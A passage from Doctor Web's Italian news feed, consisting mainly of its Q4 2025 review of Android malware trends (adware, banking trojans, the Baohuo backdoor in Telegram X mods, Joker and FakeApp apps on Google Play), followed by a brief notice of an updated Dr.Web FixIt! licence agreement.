&lt;/div&gt;

&lt;h3&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h3&gt;

&lt;p&gt;Secondo i dati statistici di rilevamento di Dr.Web Security Space per dispositivi mobili, nel IV trimestre 2025 le minacce Android più diffuse, nonostante un calo dell'attività, di nuovo sono stati i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Alla terza posizione sono salite le applicazioni malevole della famiglia &lt;b&gt;Android.Siggen&lt;/b&gt;, che possiedono varie funzionalità. Durante i 3 mesi passati, è cresciuta l'attività dei trojan bancari, in particolare, la crescita maggiore tra di essi è stata quella dei rappresentanti della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;I software indesiderati più diffusi sono diventati i programmi &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;, modificati tramite il servizio cloud CloudInject. Tra i software potenzialmente pericolosi, la maggiore attività si osservava da parte delle applicazioni &lt;b&gt;Tool.NPMod&lt;/b&gt;, modificate tramite lo strumento NP Manager. I programmi pubblicitari più diffusi si sono rivelati i moduli &lt;b&gt;Adware.Adpush&lt;/b&gt;, che gli sviluppatori incorporano in programmi Android.&lt;/p&gt;

&lt;p&gt;Ad ottobre l'azienda Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15076&amp;lng=it" target="_blank"&gt;ha pubblicato&lt;/a&gt; informazioni su un pericoloso backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, incorporato dai malintenzionati in mod del programma di messaggistica Telegram X. Il programma malevolo ruba informazioni confidenziali e consente di gestire l'account della vittima, nonché controllare direttamente il programma di messaggistica modificandone la logica di funzionamento.&lt;/p&gt;

&lt;p&gt;Durante il IV trimestre, i nostri analisti dei virus hanno scoperto sullo store di app Google Play ulteriori minacce, in particolare, i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che iscrivono gli utenti a servizi a pagamento, nonché le applicazioni malevole &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; utilizzate per scopi fraudolenti.&lt;/p&gt;

&lt;p&gt;Eventi più importanti relativi alla sicurezza "mobile" in IV trimestre: &lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Trojan pubblicitari rimangono le minacce per dispositivi Android più diffuse&lt;/li&gt;
    &lt;li&gt;Cresciuta l'attività dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;Rilevato in mod estranee del programma di messaggistica Telegram X un pericoloso backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;Comparse sullo store di app Google Play nuove applicazioni malevole&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel IV trimestre 2025 leggete la nostra &lt;a href="https://news.drweb-av.it/show/?i=15101&amp;lng=it" target="_blank"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15101&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in IV trimestre 2025</title><link>https://news.drweb-av.it/show/?i=15101&amp;lng=it&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;12 gennaio 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel IV trimestre 2025 di nuovo le minacce Android più diffuse sono stati i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; che visualizzano annunci pubblicitari invadenti. Con tutto ciò, la loro attività è diminuita: quelli primi venivano rilevati sui dispositivi protetti il 43,24% in meno, e quelli secondi il 18,06% in meno. Sono seguiti dai trojan della famiglia &lt;b&gt;Android.Siggen&lt;/b&gt;, che includono applicazioni malevole con funzionalità diverse. Anch'essi venivano rilevati meno spesso: il 27,47% in meno.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Allo stesso tempo, si registrava un notevole aumento dell'attività dei trojan bancari, che gli utenti riscontravano il 65,52% in più. Questo aumento è dovuto principalmente ai rappresentanti della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Tali programmi malevoli intercettano gli SMS con codici monouso per la conferma di operazioni bancarie, e inoltre, possono imitare l'aspetto esteriore del vero software bancario e visualizzare le finestre di phishing.&lt;/p&gt;

&lt;p&gt;Tra i software indesiderati, sono diventati i più diffusi i programmi Android modificati tramite il servizio cloud CloudInject (l'antivirus Dr.Web li rileva come &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;). Tramite questo servizio, alle applicazioni vengono aggiunti pericolose autorizzazioni di sistema e un codice offuscato, le cui funzionalità è impossibile controllare. Inoltre, si riscontravano spesso sui dispositivi i falsi antivirus &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, che rilevano minacce inesistenti, e per "eliminarle", chiedono di acquistare una versione completa, nonché &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; — applicazioni che presumibilmente permetterebbero di guadagnare eseguendo vari compiti.&lt;/p&gt;

&lt;p&gt;I programmi potenzialmente pericolosi più diffusi nel IV trimestre sono state le applicazioni &lt;b&gt;Tool.NPMod&lt;/b&gt;, modificate tramite l'utility NP Manager. Essa offusca il codice delle mod e aggiunge ad esse un modulo speciale che consente di aggirare il controllo della firma digitale dopo la modifica delle applicazioni. Tra i programmi pubblicitari, hanno mantenuto la leadership i rappresentanti della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;. Questi sono moduli software speciali che gli sviluppatori incorporano in programmi per la visualizzazione di notifiche pubblicitarie.&lt;/p&gt;

&lt;p&gt;Ad ottobre i nostri specialisti &lt;a href="https://news.drweb-av.it/show/?i=15076" target="_blank"&gt;hanno riferito&lt;/a&gt; informazioni su un pericoloso backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, che i malintenzionati hanno incorporato in mod non ufficiali del programma di messaggistica Telegram X e distribuivano sia tramite siti malevoli che tramite store di app Android di terze parti. Il programma malevolo ruba i login e le password degli account Telegram, nonché altri dati confidenziali. Oltre a ciò, per il suo tramite, i cybercriminali in effetti sono in grado di gestire l'account della vittima ed eseguire impercettibilmente nel programma di messaggistica varie azioni a suo nome. Ad esempio, seguire e abbondonare canali Telegram, nascondere nuovi dispositivi autorizzati, nascondere determinati messaggi ecc. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; viene gestito, tra l'altro, anche tramite il database Redis, il che in precedenza non si riscontrava nelle minacce Android. In totale, il backdoor ha infettati all'incirca 58.000 dispositivi, tra cui circa 3.000 vari modelli di smartphone, tablet, TV box e auto con computer di bordo su base Android.&lt;/p&gt;

&lt;p&gt;Nell'ultimo trimestre il laboratorio antivirus dell'azienda Doctor Web ha rilevato sullo store di app Google Play nuove applicazioni malevole, tra le quali sono stati i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che abbonano le vittime a servizi a pagamento, e i vari programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, impiegati in schermi fraudolenti. In totale, sono stati scaricati almeno 263.000 volte.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;PRINCIPALI TENDENZE DI IV TRIMESTRE&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Trojan pubblicitari rimangono le minacce Android più diffuse&lt;/li&gt;
        &lt;li&gt;Aumento del numero di attacchi dei trojan bancari&lt;/li&gt;
        &lt;li&gt;Diffusione del pericoloso backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, incorporato in mod del programma di messaggistica Telegram X&lt;/li&gt;
        &lt;li&gt;Comparsa di ulteriori applicazioni malevole sullo store Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati di Dr.Web Security Space per dispositivi mobili&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che visualizza annunci pubblicitari invadenti. È un modulo software che gli sviluppatori software incorporano in applicazioni.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di mod malevole dell'applicazione di messaggistica WhatsApp, che impercettibilmente per l'utente possono caricare vari siti in modalità background.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un programma di offuscamento, tra l'altro, utilizzato per la protezione di applicazioni malevole (ad esempio, di alcune versioni dei trojan bancari &lt;b&gt;Android.SpyMax&lt;/b&gt;).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un packer per i trojan della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, studiato per proteggerli dall'analisi e dal rilevamento. Il più delle volte i malintenzionati lo utilizzano insieme a mod malevole dell'applicazione di messaggistica Telegram, in cui questi trojan sono direttamente integrati.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, il modificatore ottiene la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito hanno una lista dei sistemi di pagamento e delle banche più popolari attraverso cui presumibilmente sarebbe possibile trasferire i premi. Ma anche quando gli utenti riescono ad accumulare la somma sufficiente per il prelievo, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma per il monitoraggio dei proprietari di dispositivi Android. Consente di leggere SMS, ottenere informazioni su chiamate, tracciare la posizione del dispositivo e registrare l'audio dell'ambiente circostante.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. In tali programmi è incorporato un modulo speciale che consente di aggirare il controllo della firma digitale dopo la loro modifica.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di una serie di versioni potenzialmente pericolose di un framework specializzato per lo sviluppo di programmi Android nel linguaggio di programmazione di scripting Lua. La logica principale di applicazioni Lua è situata in script corrispondenti che sono cifrati e vengono decifrati dall'interprete prima dell'esecuzione. Spesso questo framework di default chiede l'accesso a un gran numero di autorizzazioni di sistema per il funzionamento. Come risultato, gli script Lua eseguiti attraverso di esso sono in grado di effettuare varie azioni malevole in base alle autorizzazioni ricevute.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli pubblicitari che possono essere integrati in programmi Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questi moduli raccolgono una serie di dati riservati, nonché sono in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Bastion.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi di ottimizzazione che creano periodicamente notifiche con messaggi fuorvianti su memoria presumibilmente insufficiente ed errori di sistema, allo scopo di visualizzare annunci pubblicitari durante "l'ottimizzazione".&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli software che vengono incorporati in applicazioni Android e visualizzano le più svariate pubblicità. A seconda della versione e variante, queste possono essere notifiche, finestre a comparsa o banner pubblicitari. Tramite questi moduli, i malintenzionati spesso distribuiscono programmi malevoli invitando a installare determinati software. Inoltre, tali moduli trasmettono al server remoto varie informazioni riservate.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di alcune versioni modificate (mods) dell'app di messaggistica WhatsApp, nelle funzionalità delle quali è incorporato un codice per caricare i link di destinazione tramite web view durante l'utilizzo dell'app. Da questi indirizzi internet viene eseguito il reindirizzamento verso i siti pubblicizzati, ad esempio, casinò online e scommesse, siti per adulti.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Minacce su Google Play&lt;/h3&gt;

&lt;p&gt;Durante il IV trimestre 2025, gli analisti dei virus dell'azienda Doctor Web hanno registrato la comparsa sullo store di app Google Play di oltre due decine di applicazioni malevole &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, studiate per iscrivere gli utenti a servizi a pagamento. I malintenzionati le hanno camuffate da vari software: app di messaggistica, utility per l'ottimizzazione del funzionamento del sistema, editor grafici e programmi per la visualizzazione di film.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempi dei programmi malevoli rilevati &lt;b&gt;Android.Joker&lt;/b&gt;. &lt;b&gt;Android.Joker.2496&lt;/b&gt; era camuffato da strumento per la "cancellazione di spazzatura" da telefono Useful Cleaner, mentre una delle varianti &lt;b&gt;Android.Joker.2495&lt;/b&gt; da lettore di film Reel Drama&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Oltre a ciò, i nostri specialisti hanno rilevato alcuni nuovi programmi falsificazione dalla famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. Come in precedenza, alcuni di essi venivano distribuiti con il pretesto di applicazioni finanziarie e caricavano siti fraudolenti. Altre tali app falsificazione venivano spacciate per giochi. A determinate condizioni (ad esempio, se l'indirizzo IP dell'utente soddisfa i requisiti dei malintenzionati), esse caricavano siti di scommesse e casinò online.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Gioco Chicken Road Fun era il programma falsificazione &lt;b&gt;Android.FakeApp.1910&lt;/b&gt;, e invece di fornire le funzionalità attese dall'utente, poteva caricare un sito di casinò online&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Per la protezione dei dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q4%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15095&amp;lng=it</guid><title>Aggiornato il contratto di licenza per il prodotto Dr.Web FixIt!</title><link>https://news.drweb-av.it/show/?i=15095&amp;lng=it&amp;c=5</link><pubDate>Mon, 29 Dec 2025 13:41:36 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Abbiamo aggiornato il contratto di licenza per il prodotto Dr.Web FixIt!. Il documento può essere visionato al link &lt;a href="https://license.drweb.com/agreement"&gt;https://license.drweb.com/agreement.&lt;/a&gt;&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! è necessario per effettuare un'analisi dettagliata della sicurezza di postazioni e server con SO Windows ed eliminare le minacce di virus e potenziali vulnerabilità rilevate. Il suo vantaggio chiave è la sua capacità di rilevare i malware e programmi utilizzati per attacchi mirati più recenti, che non vengono rilevati da altri strumenti di cybersecurity.&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! è destinato, in primo luogo, ai professionisti che monitorano la sicurezza delle infrastrutture informatiche e analizzano gli incidenti cyber. Ciononostante, anche in assenza in un'azienda di un team SOC specializzato, la soluzione è in grado sia di diagnosticare una minaccia su una postazione e/o un server e sia di eseguire la cura dopo il rilevamento.&amp;nbsp;&lt;br&gt;Se necessario, gli specialisti Doctor Web aiuteranno ad analizzare le informazioni ottenute tramite Dr.Web FixIt!. A questo scopo, è necessario acquistare un certificato per il supporto esperto del compito.&lt;/p&gt;&lt;p&gt;La soluzione può essere acquistata dai &lt;a href="https://partners.drweb-av.it/find_partner/?lng=it"&gt;partner&lt;/a&gt; di Doctor Web.&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item></channel></rss>
